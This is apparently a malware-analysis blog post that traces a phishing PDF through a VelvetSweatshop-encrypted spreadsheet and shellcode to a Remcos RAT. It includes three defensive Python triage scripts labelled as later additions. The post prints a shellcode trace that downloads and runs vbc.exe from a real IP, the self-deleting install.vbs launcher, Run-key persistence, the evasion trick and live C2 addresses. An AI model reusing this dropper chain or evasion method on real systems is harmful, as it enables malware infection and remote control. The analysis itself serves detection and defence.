# Formbook and Remcos Backdoor RAT

**connectwise.com/resources/formbook-remcos-rat**

August 4, 2022 by Stu Gonzalez

- Tools
- 0x01 Document Analysis (19Jun22 ARR Safari.pdf)
- 0x02 Analysis of Dropped File (vbc.exe)
- 0x03 Analysis of DLL (Periodicity.dll)
- 0x04 Dynamic Analysis
  - VBS script
  - Registry
  - iys.exe
- 0x05 Additional Findings
- 0x06 IOCs
- 0x07 Upload
- 0x08 References

## Tools

The following tools were used during this analysis:

- pdf-parser.py
- zlib-flate
- msoffcrypto-tool
- oletools
- oledump.py
- xorsearch
- scdbg
- dnSpy

## 0x01 Document Analysis (19Jun22 ARR Safari.pdf)

Whilst enjoying a refreshing orange Fanta this weekend, I figured I would check out the ole spam trap. I received 8 emails containing the same file. After downloading the .eml files, I checked to see if there was any difference between the attachments in the emails. They all showed the same hash.

Time to extract the PDF `19Jun22 ARR Safari.pdf` from the email by copying the base64 string and decoding it into a new PDF file. I used [pdf-parser.py (by Didier Stevens)](https://github.com/DidierStevens/DidierStevensSuite/blob/master/pdf-parser.py) to inspect the PDF and find interesting components of this suspicious document.

```
$ pdf-parser.py 19Jun22\ ARR\ Safari.pdf -O -a
Comment: 3
XREF: 0
Trailer: 0
StartXref: 1
Indirect object: 47
 27: 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 3, 6, 8, 10, 11, 25, 27, 28, 29, 38, 40, 42, 44, 46
 /Action 1: 7
 /Catalog 1: 2
 /EmbeddedFile 1: 37
 /Filespec 1: 26
 /Font 1: 30
 /ObjStm 1: 1
 /Outlines 1: 4
 /Page 1: 9
 /Pages 1: 5
 /XObject 10: 31, 32, 33, 34, 35, 36, 39, 41, 43, 45
 /XRef 1: 47
Search keywords:
 /JS 1: 7
 /JavaScript 1: 7
 /OpenAction 1: 2
 /AcroForm 1: 2
 /EmbeddedFile 1: 37
```

The /JavaScript and /EmbeddedFile objects looked interesting and worth further investigation. The /JavaScript object (7) did not contain anything of value, but the /EmbeddedFile object (37), on the other hand, was a decent chunk in size.
```
$ pdf-parser.py 19Jun22\ ARR\ Safari.pdf -O -o 37 -d safari.compressed
obj 37 0
 Type: /EmbeddedFile
 Referencing:
 Contains stream

  <<
    /Filter /FlateDecode
    /Type /EmbeddedFile
    /Length 48959
  >>
```

Using pdf-parser.py, I was able to extract the embedded file from the PDF. Note that `-d` dumps the raw stream, so the /FlateDecode layer is still in place (pdf-parser's `-f` would apply the filter; here zlib-flate does the same job):

```
$ file safari.compressed
safari.compressed: zlib compressed data
```

The file was zlib compressed, so I used `zlib-flate -uncompress` to decompress it:

```
$ zlib-flate -uncompress < safari.compressed > safari.encrypted
```

Checking the file again showed that it was [CDFV2 Encrypted](https://en.wikipedia.org/wiki/Compound_File_Binary_Format):

```
$ file safari.encrypted
safari.encrypted: CDFV2 Encrypted
```

After some searching to figure out what the password could possibly be, I solidified the notion that this was Formbook, and thanks to [this article](https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/) I was able to confirm the password was the default Microsoft password, VelvetSweatshop.

_VelvetSweatshop is a default key stored in Microsoft Excel program code for decryption. It's a neat trick that attackers can leverage to encrypt malicious Excel files in order to evade static-analysis-based detection systems, while eliminating the need for a potential victim to enter a password._

I used [msoffcrypto-tool](https://github.com/nolze/msoffcrypto-tool) to decrypt the file:

```
$ msoffcrypto-tool safari.encrypted safari.decrypted -p VelvetSweatshop
```

Checking the decrypted file, the final format is an Excel document:

```
$ file safari.decrypted
safari.decrypted: Microsoft Excel 2007+
```

As with most MS Office documents, the next thing to check for was macros.
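The unwrapping chain above (zlib stream, then a CDFV2/OLE2 container, then whatever it protects) can be automated so the next sample of this kind is classified without running `file` by hand at every step. The script below is an added example for this write-up, not code from the original post or from any of the tools it uses. It relies only on the Python standard library, so it stops at identifying the compound file and reporting its header fields; the actual decryption still goes through msoffcrypto-tool. The `SAMPLE_COMPRESSED` bytes are a constructed stand-in for the real embedded stream, not the sample itself.

```python
"""Peel the layers of a PDF-embedded payload by magic bytes (added example)."""
import struct
import zlib

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # MS-CFB header signature


def looks_like_zlib(data: bytes) -> bool:
    """RFC 1950 header check: CM == 8 (deflate) and CMF*256+FLG divisible by 31."""
    if len(data) < 2 or (data[0] & 0x0F) != 8:
        return False
    return ((data[0] << 8) | data[1]) % 31 == 0


def identify(data: bytes) -> str:
    """Classify a blob by its leading bytes; fixed magics are tested before the zlib heuristic."""
    if data[:8] == CFB_MAGIC:
        return "cfb"      # OLE2 compound file: legacy Office, or the wrapper of an encrypted OOXML file
    if data[:4] == b"PK\x03\x04":
        return "zip"      # plain OOXML (.xlsx/.docx) is a ZIP container
    if data[:2] == b"MZ":
        return "pe"
    if data[:4] == b"%PDF":
        return "pdf"
    if looks_like_zlib(data):
        return "zlib"
    return "unknown"


def parse_cfb_header(data: bytes) -> dict:
    """Return the CFB header fields that matter for triage (MS-CFB section 2.2)."""
    if len(data) < 512 or data[:8] != CFB_MAGIC:
        raise ValueError("not a CFB container")
    minor, major, byte_order, sector_shift, mini_shift = struct.unpack_from("<HHHHH", data, 24)
    return {
        "major_version": major,          # 3 -> 512-byte sectors, 4 -> 4096-byte sectors
        "minor_version": minor,
        "little_endian": byte_order == 0xFFFE,
        "sector_size": 1 << sector_shift,
        "mini_sector_size": 1 << mini_shift,
    }


def unwrap(data: bytes):
    """Strip transparent compression layers; return (chain of types seen, innermost bytes).
    Stops at anything that needs a key (the CFB container) or is already a final format."""
    chain = []
    while True:
        kind = identify(data)
        chain.append(kind)
        if kind != "zlib":
            return chain, data
        data = zlib.decompress(data)


def _constructed_cfb() -> bytes:
    """Minimal two-sector CFB image (header + one empty sector). Constructed, not a real sample."""
    header = CFB_MAGIC + b"\x00" * 16                        # signature + null CLSID
    header += struct.pack("<HHHHH", 0x3E, 3, 0xFFFE, 9, 6)   # minor, major, byte order, sector shifts
    return header.ljust(512, b"\x00") + b"\x00" * 512


# Stand-in for the raw stream pdf-parser.py -d would write out.
SAMPLE_COMPRESSED = zlib.compress(_constructed_cfb())


if __name__ == "__main__":
    chain, payload = unwrap(SAMPLE_COMPRESSED)
    print("layers:", " -> ".join(chain))
    if chain[-1] == "cfb":
        print("cfb header:", parse_cfb_header(payload))
        print("next step: msoffcrypto-tool <in> <out> -p VelvetSweatshop")
```

On the real stream the script reports `zlib -> cfb`, which is the point at which the VelvetSweatshop trick applies; a `zip` result instead would mean an unencrypted OOXML file that can go straight to olevba.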
```
$ olevba safari.decrypted
olevba 0.60 on Python 3.8.10 - http://decalage.info/python/oletools
===============================================================================
FILE: safari.decrypted
Type: OpenXML
No VBA or XLM macros found.
```

[Oletools](https://github.com/decalage2/oletools) yielded no interesting or actionable information. Next I chose [oledump.py (by Didier Stevens)](https://blog.didierstevens.com/programs/oledump-py/) and used it to check for OLE objects:

```
$ oledump.py safari.decrypted
A: xl/embeddings/oleObject1.bin
 A1:      20 '\x01Ole'
 A2:    1721 '\x01Ole10NAtivE'
```

An OLE object embedded in a spreadsheet that contains no macro code could well be carrying shellcode. Since the A2 stream is the larger one, let's extract it and see if `xorsearch -W` can help us find an entry point. First, extract the stream with oledump.py:

```
$ oledump.py -d -s A2 safari.decrypted > shellcode.data
```

Now search it with [xorsearch](https://blog.didierstevens.com/programs/xorsearch/):

```
$ xorsearch -W shellcode.data
Found XOR 00 position 0000024D: GetEIP method 3 E99C000000
Found ROT 25 position 0000024D: GetEIP method 3 E99C000000
Found ROT 24 position 0000024D: GetEIP method 3 E99C000000
Found ROT 23 position 0000024D: GetEIP method 3 E99C000000
Found ROT 22 position 0000024D: GetEIP method 3 E99C000000
Found ROT 21 position 0000024D: GetEIP method 3 E99C000000
...
```

xorsearch found a GetEIP method at offset 0x24D in the A2 stream we exported (the XOR 00 hit means the shellcode is not XOR-encoded; the ROT hits are the same bytes seen through other keys). We can use this offset as the start offset in scdbg to emulate the shellcode execution. Select the shellcode file (shellcode.data), set the start offset to 0x24D, and launch.

Output from running scdbg:
```
4014c4 GetProcAddress(ExpandEnvironmentStringsW)
4014f7 ExpandEnvironmentStringsW(%PUBLIC%\vbc.exe, dst=12fbd8, sz=104)
40150c LoadLibraryW(UrlMon)
401527 GetProcAddress(URLDownloadToFileW)
40157f URLDownloadToFileW(http://185.239.243.122/421/vbc.exe, C:\Users\Public\vbc.exe)
401596 LoadLibraryW(shell32)
4015ac GetProcAddress(ShellExecuteW)
4015bb unhooked call to shell32.ShellExecuteW step=40468
```

In the shellcode, the adversary uses ExpandEnvironmentStringsW to resolve the Public folder on the victim's Windows install. Next, they use URLDownloadToFileW to retrieve hxxp://185.239.243.122/421/vbc.exe and write it to C:\Users\Public\vbc.exe. Finally, they use ShellExecuteW to launch vbc.exe.

The endpoint was still live and delivering the payload, so I grabbed the executable to begin identifying what vbc.exe could be.

## 0x02 Analysis of Dropped File (vbc.exe)

```
$ file vbc.exe
vbc.exe: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
```

As you can see, vbc.exe is compiled for .NET. I opened vbc.exe in dnSpy on my VM.

After opening the executable in dnSpy, I found that the functions were encoded, and I could only assume that other parts of the executable were obfuscated as well. For ease of reading, I ran de4dot against the executable to clean it up a bit. That's better!

Stepping into execution, I ran across a byte array called `<>`. The byte array is loaded with the contents of `Documents._22`.

A MemoryStream variable called memoryStream then loads the `<>` byte array. Next, a GZipStream variable called gzipStream decompresses the contents of memoryStream. Lastly, a second MemoryStream called memoryStream2 receives the decompressed contents copied from gzipStream. After copying the stream, I can see a PE magic number (0x4D5A, "MZ") in the _buffer byte array. What is this binary file?! Let's dump and save it for later analysis.
Right click on the _buffer variable → Show in Memory Window → Memory 1. I am then shown the Memory Window with my binary file already highlighted and selected. Right click → Save Selection → save as dump.exe. After saving the binary, I checked the metadata of the file and could see it is a .NET DLL called Periodicity.dll.

Now that I have that saved, I head back to check what comes next with my memoryStream2 buffer. The variable memoryStream2 is then passed to a function that simply calls into System.Reflection.Assembly to load the binary into memory. The handle to the binary loaded into memory now resides in the assembly_ variable.

The next time we see the assembly_ variable, the process is retrieving the public types defined in the assembly that are visible outside it. The returned data shows the Module, Name, and Namespace of the exported type.

Next, I found the function MyPoint() sets an array variable with 3 values that will later be used as arguments for the DLL that was loaded into memory (the first two are ASCII hex: "PlatformNotSupportedExcept" and "L7UM"):

```
"506C6174666F726D4E6F74537570706F72746564457863657074"
"4C37554D"
"PolicyLevel"
```

Stepping through, I came across the last function, which calls Activator.CreateInstance and supplies the exported type variable (_type) and the array of parameters I mentioned.

After running this last function, the execution of vbc.exe within dnSpy terminates and a new process begins running by the name of iys.exe. This instance is running from the %AppData%\Roaming directory.
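The dnSpy steps above (gzip-decompress the byte array, spot the MZ header, dump the buffer, confirm it is a .NET DLL) can be done in one pass over a memory dump or over the raw resource bytes. The script below is an added example for this write-up, not the malware's code and not code from the original post: it carves every gzip member out of a blob, decompresses it, and checks the PE optional header's CLR Runtime Header data directory, which is what distinguishes a managed assembly such as Periodicity.dll from a plain native DLL. The embedded PE is a constructed minimal header, and `SAMPLE_BLOB` stands in for the contents of `Documents._22`; neither is taken from the real sample.

```python
"""Carve gzip-wrapped payloads from a byte array and confirm they are .NET PEs (added example)."""
import struct
import zlib

GZIP_MAGIC = b"\x1f\x8b\x08"   # gzip header: ID1, ID2, CM = deflate


def carve_gzip(blob: bytes):
    """Yield (offset, decompressed bytes) for every complete gzip member found in blob.
    zlib.decompressobj is used instead of gzip.decompress so that trailing bytes after
    a member (the usual case inside a larger array) do not abort the decode."""
    start = 0
    while (idx := blob.find(GZIP_MAGIC, start)) != -1:
        decoder = zlib.decompressobj(16 + zlib.MAX_WBITS)   # 16+ selects the gzip wrapper
        try:
            out = decoder.decompress(blob[idx:])
            if decoder.eof:                                   # only report complete members
                yield idx, out
        except zlib.error:
            pass                                              # false positive on the magic bytes
        start = idx + 1


def is_dotnet_pe(data: bytes) -> bool:
    """True if data is a PE whose IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR (index 14) is populated."""
    try:
        if data[:2] != b"MZ":
            return False
        e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
        if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
            return False
        opt = e_lfanew + 4 + 20                               # skip signature and COFF header
        magic = struct.unpack_from("<H", data, opt)[0]
        dirs = opt + (96 if magic == 0x10B else 112)          # PE32 vs PE32+ optional header layout
        clr_rva, clr_size = struct.unpack_from("<II", data, dirs + 14 * 8)
        return clr_rva != 0 and clr_size != 0
    except struct.error:
        return False


def find_dotnet_payloads(blob: bytes) -> list:
    """Return [(offset, payload)] for every gzip member that decompresses to a .NET PE."""
    return [(off, pe) for off, pe in carve_gzip(blob) if is_dotnet_pe(pe)]


def _build_fake_dotnet_pe() -> bytes:
    """Constructed PE32 header with a non-empty CLR directory; only the fields read above are meaningful."""
    dos = (b"MZ" + b"\x00" * 58 + struct.pack("<I", 0x80)).ljust(0x80, b"\x00")   # e_lfanew = 0x80
    coff = struct.pack("<HHIIIHH", 0x14C, 1, 0, 0, 0, 224, 0x2102)   # i386, 1 section, opt hdr 224, DLL
    data_dirs = [(0, 0)] * 16
    data_dirs[14] = (0x2008, 0x48)                                   # CLR Runtime Header RVA/size
    opt = struct.pack("<H", 0x10B) + b"\x00" * 94                     # PE32 magic + rest of fixed fields
    opt += b"".join(struct.pack("<II", rva, size) for rva, size in data_dirs)
    return dos + b"PE\x00\x00" + coff + opt + b"\x00" * 64


import gzip  # used only to build the constructed sample
SAMPLE_BLOB = b"\x00" * 37 + gzip.compress(_build_fake_dotnet_pe()) + b"\x00" * 9


if __name__ == "__main__":
    for off, pe in find_dotnet_payloads(SAMPLE_BLOB):
        print(f"gzip member at 0x{off:x} -> .NET PE, {len(pe)} bytes")
        with open(f"carved_{off:x}.dll", "wb") as fh:   # same artefact as the dnSpy "Save Selection"
            fh.write(pe)
```

A payload that passes `is_dotnet_pe` is worth loading into dnSpy directly; one that carves but fails the check is a native PE and belongs in a different toolchain.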
## 0x03 Analysis of DLL (Periodicity.dll)

I tried executing the .NET DLL Periodicity.dll via [SharpDllLoader](https://github.com/hexfati/SharpDllLoader), with the parameters I found earlier in my analysis of vbc.exe:

```
Executable: C:\Users\IEUser\Downloads\SharpDllLoader-master\SharpDllLoader\bin\Release\SharpDllLoader.exe
Arguments: -d "C:\Users\IEUser\Desktop\dump.dll" -c CPeriodCollection -m .ctor -a "506C6174666F726D4E6F74537570706F72746564457863657074 4C37554D PolicyLevel"
Working Directory:
Break At: Entry Point
```

This did not work as I thought it would. I am not sure how I am supposed to load this DLL to analyze it, but I will read more into the process and hopefully can analyze it in the future.

## 0x04 Dynamic Analysis

Let's execute vbc.exe on my sandbox with Process Hacker, ProcMon, and Wireshark running to capture all the fun bits. I set my ProcMon filter to watch for what I know so far: the process names vbc.exe and iys.exe. Wireshark will just be listening to all traffic on my network interface. I let this run for several minutes to make sure I wasn't missing any delayed executions or network calls.

I was able to find file drops to the %AppData% directory, registry entries, and network activity.

### VBS script

A VBS script is written to the Temp folder and then promptly executed by vbc.exe via wscript.exe:

```
C:\Windows\System32\WScript.exe C:\Users\IEUser\AppData\Local\Temp\install.vbs
```

The VBS script appeared to have a self-delete component. I used the following PowerShell to copy the VBS script before it was deleted.
```
$src = "C:\Users\IEUser\AppData\Local\Temp\install.vbs"
# Poll until the dropper writes the script, then copy it before it deletes itself
while (!(Test-Path $src)) { Start-Sleep -Milliseconds 50 }
Copy-Item $src "C:\Users\IEUser\Desktop\install.vbs"
```

Contents of install.vbs:

```
WScript.Sleep 1000
Set fso = CreateObject("Scripting.FileSystemObject")
CreateObject("WScript.Shell").Run "cmd /c ""C:\Users\IEUser\AppData\Roaming\iys.exe""", 0
fso.DeleteFile(Wscript.ScriptFullName)
```

### Registry

The registry value HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475 contains binary data. The data looks very similar to the unstructured DLL binary array that was loaded into the MemoryStream earlier during the code analysis of vbc.exe.

The registry value HKCU\Software\Microsoft\Windows\CurrentVersion\Run\gtr contains the path C:\Users\IEUser\AppData\Roaming\iys.exe, so the RAT is executed at every logon (persistence).

Lastly, two entries under HKCU\Software\Remcos-KO7WBT match the known Remcos RAT registry entry structure:

```
exepath: 9c d6 73 bf e5 0f be a9 5e 14 57 ab f4 aa 59 ec 19 64 9d 8b 9e 09 91 99 e5 e3 1e ee 0c db da cb 05 57 db ea 8a 65 74 f8 0a 1e 28 9b 42 d8 22 fe 35 01 71 d1 e3 64 74 53 6a 11 af 27 66 18 d5 7a 7f 21 46 1c 14 5b c4 57 ac e0 f5 8b da 83 4d af
licence: d75ea3de2ad117e4485816ef2a4a46f1
```

### iys.exe

- A new file is written to %AppData%\Roaming\iys.exe.
- The iys.exe hash matches vbc.exe.
- iys.exe uses C:\Users\IEUser\AppData\Roaming\logs.dat to log information, likely related to its C2 activity.
- iys.exe was seen making network connections out to 62.197.136.86 over port 3091 and to 178.237.33.50 over port 80.

## 0x05 Additional Findings

I found an interesting choice of icon image stored in the Resources of the executable. A reverse image search of the icon turned up the National Emblem of Indonesia, the Garuda Pancasila.
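The registry artefacts above (a Run value pointing into %AppData%\Roaming, and a Software\Remcos-&lt;id&gt; key holding exepath and licence) are the cheapest host indicators to sweep for on other machines. The script below is an added example for this write-up, not part of the original post: it parses `reg query <key> /s` output and flags exactly those two patterns, so the check can be repeated from an exported registry listing without a debugger attached. `SAMPLE_REG_QUERY` is constructed to mirror the keys seen in this analysis (the exepath value is truncated to the first 16 bytes); the benign OneDrive entry is included to show that the Run-key rule only fires on user-writable paths.

```python
"""Flag Remcos-style persistence and configuration keys in `reg query /s` output (added example)."""
import re

# A Run/RunOnce value is only interesting when its command lives in a user-writable location.
RUN_KEY = re.compile(r"\\Software\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.I)
WRITABLE_DIRS = re.compile(r"\\(AppData\\Roaming|AppData\\Local\\Temp|Users\\Public|ProgramData)\\", re.I)
# Remcos keeps its configuration under HKCU\Software\Remcos-<id> (exepath, licence, ...).
REMCOS_KEY = re.compile(r"\\Software\\Remcos-[A-Z0-9]+$", re.I)


def parse_reg_query(text: str) -> list:
    """Parse `reg query <key> /s` output into (key, value_name, reg_type, data) tuples.
    Key lines start in column 0; value lines are indented and separated by runs of spaces."""
    entries, key = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line[0].isspace():
            key = line.strip()
            continue
        parts = re.split(r"\s{2,}", line.strip(), maxsplit=2)   # data may itself contain single spaces
        if key and len(parts) == 3:
            entries.append((key, parts[0], parts[1], parts[2]))
    return entries


def find_remcos_artifacts(entries: list) -> list:
    """Return (category, detail) findings: 'persistence' for suspicious Run values,
    'remcos-config' for any value under a Remcos-<id> key."""
    findings = []
    for key, name, reg_type, data in entries:
        if RUN_KEY.search(key) and WRITABLE_DIRS.search(data):
            findings.append(("persistence", f"{key}\\{name} -> {data}"))
        if REMCOS_KEY.search(key):
            findings.append(("remcos-config", f"{key}\\{name} ({reg_type})"))
    return findings


# Constructed listing modelled on the keys observed in this analysis; not a real export.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    gtr    REG_SZ    C:\Users\IEUser\AppData\Roaming\iys.exe

HKEY_CURRENT_USER\Software\Remcos-KO7WBT
    exepath    REG_BINARY    9CD673BFE50FBEA95E1457ABF4AA59EC
    licence    REG_SZ    d75ea3de2ad117e4485816ef2a4a46f1
"""


if __name__ == "__main__":
    for category, detail in find_remcos_artifacts(parse_reg_query(SAMPLE_REG_QUERY)):
        print(f"[{category}] {detail}")
```

On a live host the input would come from `reg query HKCU\Software /s` redirected to a file; the Remcos rule keys on the key name alone, because the `<id>` suffix (KO7WBT here) changes between builds while the `Remcos-` prefix and the exepath/licence value names do not.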
## 0x06 IOCs

| Hash (SHA-256) | Filename |
| --- | --- |
| d1c2cc0ca653df8ddb46c1337a5972eaceb81ea924e8ebdb7af0699a7ab909fd | 19Jun22 ARR Safari.pdf |
| 5d17b63fe99f0608c79129a296bba3af7c8dcfe17913f93ce67dbda376f6987c | safari_pdf_embedded_file.compressed |
| 25672487eb5df23ce72e6ea101ef4047c1407cb0dcb25e59486f125763a9f69d | safari_pdf_embedded_file.encrypted |
| e1192a47786ea37fd75864d7b8b9a049b4ab72bad852b052318f863713bc97d7 | safari_pdf_embedded_file.decrypted |
| dac51b15136081c2540d2c4c16372668e5e54c89d233e8b30faaabf7c901bc84 | vbc.exe |
| 490a432a796c670a8eb7b93ee1710eb023ab12fcebc7a7225c4d7b030330abb8 | shellcode.data |

| IP / URL | Role |
| --- | --- |
| hxxp://185.239.243.122/421/vbc.exe | Dropper |
| 62.197.136.86:3091 | C2 |
| 178.237.33.50:80 | GeoIP location lookup |

| File | Role |
| --- | --- |
| C:\Users\Public\vbc.exe | Dropped file path |
| %AppData%\Local\Temp\install.vbs | VBS script |
| %AppData%\Roaming\logs.dat | C2 log file |
| %AppData%\Roaming\iys.exe | Persistence RAT path |

| Registry | Data |
| --- | --- |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Run\gtr | %AppData%\Roaming\iys.exe |
| HKCU\Software\Remcos-KO7WBT\exepath | 9C D6 73 BF E5 0F BE A9 5E 14 57 AB F4 AA 59 EC ... |
| HKCU\Software\Remcos-KO7WBT\licence | D75EA3DE2AD117E4485816EF2A4A46F1 |
| HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Notifications\Data\418A073AA3BC3475 | Binary data |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass | 1 |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName | 1 |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet | 1 |
| HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect | 0 |

## 0x07 Upload

- [https://www.filescan.io/uploads/62aecf127046ab63f87d6f0c/reports/40faed10-37d6-4273-8c8fb58fcfcd676a/overview](https://www.filescan.io/uploads/62aecf127046ab63f87d6f0c/reports/40faed10-37d6-4273-8c8fb58fcfcd676a/overview)
- [https://bazaar.abuse.ch/sample/d1c2cc0ca653df8ddb46c1337a5972eaceb81ea924e8ebdb7af0699a7ab909fd/](https://bazaar.abuse.ch/sample/d1c2cc0ca653df8ddb46c1337a5972eaceb81ea924e8ebdb7af0699a7ab909fd/)

## 0x08 References

- [https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/](https://forensicitguy.github.io/xloader-formbook-velvetsweatshop-spreadsheet/)
- [https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/backdoor.win32.remcos.usmaneaggk/](https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/backdoor.win32.remcos.usmaneaggk/)